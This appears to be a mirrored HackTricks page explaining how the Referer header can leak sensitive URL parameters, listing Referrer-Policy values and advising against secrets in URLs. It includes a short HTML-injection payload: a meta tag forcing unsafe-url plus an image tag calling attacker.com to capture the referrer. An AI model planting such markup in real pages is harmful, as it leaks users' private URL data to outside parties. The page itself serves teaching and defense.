mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 03:53:29 +00:00
72 lines
3.4 KiB
Markdown
72 lines
3.4 KiB
Markdown
|
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
|
||
|
# Referrer headers and policy
|
||
|
|
||
|
Referrer is the header used by browsers to indicate which was the previous page visited.
|
||
|
|
||
|
## Sensitive information leaked
|
||
|
|
||
|
If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest (social engineering) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request.
|
||
|
|
||
|
## Mitigation
|
||
|
|
||
|
You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications:
|
||
|
|
||
|
```
|
||
|
Referrer-Policy: no-referrer
|
||
|
Referrer-Policy: no-referrer-when-downgrade
|
||
|
Referrer-Policy: origin
|
||
|
Referrer-Policy: origin-when-cross-origin
|
||
|
Referrer-Policy: same-origin
|
||
|
Referrer-Policy: strict-origin
|
||
|
Referrer-Policy: strict-origin-when-cross-origin
|
||
|
Referrer-Policy: unsafe-url
|
||
|
```
|
||
|
|
||
|
## Counter-Mitigation
|
||
|
|
||
|
You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):
|
||
|
|
||
|
```markup
|
||
|
<meta name="referrer" content="unsafe-url">
|
||
|
<img src="https://attacker.com">
|
||
|
```
|
||
|
|
||
|
## Defense
|
||
|
|
||
|
Never put any sensitive data inside GET parameters or paths in the URL.
|
||
|
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
|